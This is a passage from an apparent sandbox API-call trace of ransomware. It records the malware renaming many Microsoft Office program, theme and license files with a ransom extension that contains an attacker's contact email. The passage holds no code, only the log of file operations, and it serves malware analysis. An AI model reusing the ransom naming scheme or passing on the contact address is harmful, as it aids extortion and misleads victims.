Office\\root\\Document Themes 16\\Theme Effects\\Office 2007 - 2010.eftx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\office 2007 - 2010.eftx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.800] CloseHandle (hObject=0x42c) returned 1 [0160.801] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.801] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Reflection.eftx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\reflection.eftx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.801] CloseHandle (hObject=0x42c) returned 1 [0160.802] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.802] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Riblet.eftx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\riblet.eftx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.802] CloseHandle (hObject=0x42c) returned 1 [0160.803] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.803] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.803] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Smokey Glass.eftx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\smokey glass.eftx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.803] CloseHandle (hObject=0x42c) returned 1 [0160.805] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.805] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Subtle Solids.eftx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\subtle solids.eftx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.806] CloseHandle (hObject=0x42c) returned 1 [0160.808] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.808] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.808] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Top Shadow.eftx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\top shadow.eftx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.808] CloseHandle (hObject=0x42c) returned 1 [0161.596] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\Microsoft.AppV.Modernizer.ManagedCpp.dll" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\microsoft.appv.modernizer.managedcpp.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\Microsoft.AppV.Modernizer.ManagedCpp.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\microsoft.appv.modernizer.managedcpp.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0161.610] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RInt.16.msi" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rint.16.msi"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RInt.16.msi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rint.16.msi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0161.612] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\OneDriveSetup.exe" (normalized: "c:\\program files\\microsoft office\\root\\integration\\onedrivesetup.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\OneDriveSetup.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\onedrivesetup.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0161.614] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\QFE31927.msp" (normalized: "c:\\program files\\microsoft office\\root\\integration\\qfe31927.msp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\QFE31927.msp.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\qfe31927.msp.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0161.616] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\QFE31928.msp" (normalized: "c:\\program files\\microsoft office\\root\\integration\\qfe31928.msp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\QFE31928.msp.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\qfe31928.msp.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0161.617] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\SPPRedist.msi" (normalized: "c:\\program files\\microsoft office\\root\\integration\\sppredist.msi"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\SPPRedist.msi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\sppredist.msi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0161.773] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.773] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows6.1-KB2999226-x64.msu.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows6.1-kb2999226-x64.msu.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0161.774] CloseHandle (hObject=0x514) returned 1 [0161.775] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.775] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.775] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows6.1-KB2999226-x86.msu.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows6.1-kb2999226-x86.msu.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0161.776] CloseHandle (hObject=0x514) returned 1 [0161.777] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.777] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows8-RT-KB2999226-x64.msu.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows8-rt-kb2999226-x64.msu.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0161.778] CloseHandle (hObject=0x514) returned 1 [0161.779] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.779] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows8-RT-KB2999226-x86.msu.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows8-rt-kb2999226-x86.msu.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0161.781] CloseHandle (hObject=0x514) returned 1 [0161.784] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.784] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.784] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows8.1-KB2999226-x64.msu.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows8.1-kb2999226-x64.msu.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0161.785] CloseHandle (hObject=0x514) returned 1 [0161.794] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.794] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.794] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows8.1-KB2999226-x86.msu.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows8.1-kb2999226-x86.msu.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0161.795] CloseHandle (hObject=0x514) returned 1 [0161.798] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.798] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0161.799] CloseHandle (hObject=0x514) returned 1 [0161.799] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.800] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.800] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0161.800] CloseHandle (hObject=0x514) returned 1 [0161.801] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.801] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_OEM_Perp-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_oem_perp-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0161.801] CloseHandle (hObject=0x514) returned 1 [0161.812] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.813] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.813] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_OEM_Perp-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_oem_perp-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0161.814] CloseHandle (hObject=0x514) returned 1 [0161.815] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.816] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_OEM_Perp-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_oem_perp-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0161.816] CloseHandle (hObject=0x514) returned 1 [0161.823] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.823] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_OEM_Perp-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_oem_perp-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0161.824] CloseHandle (hObject=0x514) returned 1 [0161.824] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.825] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0161.825] CloseHandle (hObject=0x514) returned 1 [0161.826] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.826] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0161.826] CloseHandle (hObject=0x514) returned 1 [0161.827] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.827] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0161.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0161.962] CloseHandle (hObject=0x514) returned 1 [0162.405] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.405] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.406] CloseHandle (hObject=0x514) returned 1 [0162.408] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.408] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.408] CloseHandle (hObject=0x514) returned 1 [0162.410] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.410] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.410] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Trial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_trial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.410] CloseHandle (hObject=0x514) returned 1 [0162.411] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.411] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.412] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Trial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_trial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.412] CloseHandle (hObject=0x514) returned 1 [0162.413] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.414] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Trial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_trial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.414] CloseHandle (hObject=0x514) returned 1 [0162.415] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.415] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.415] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_KMS_Client-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_kms_client-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.415] CloseHandle (hObject=0x514) returned 1 [0162.417] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.417] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_KMS_Client-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_kms_client-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.417] CloseHandle (hObject=0x514) returned 1 [0162.418] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.418] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_KMS_Client-ul.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_kms_client-ul.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.419] CloseHandle (hObject=0x514) returned 1 [0162.420] 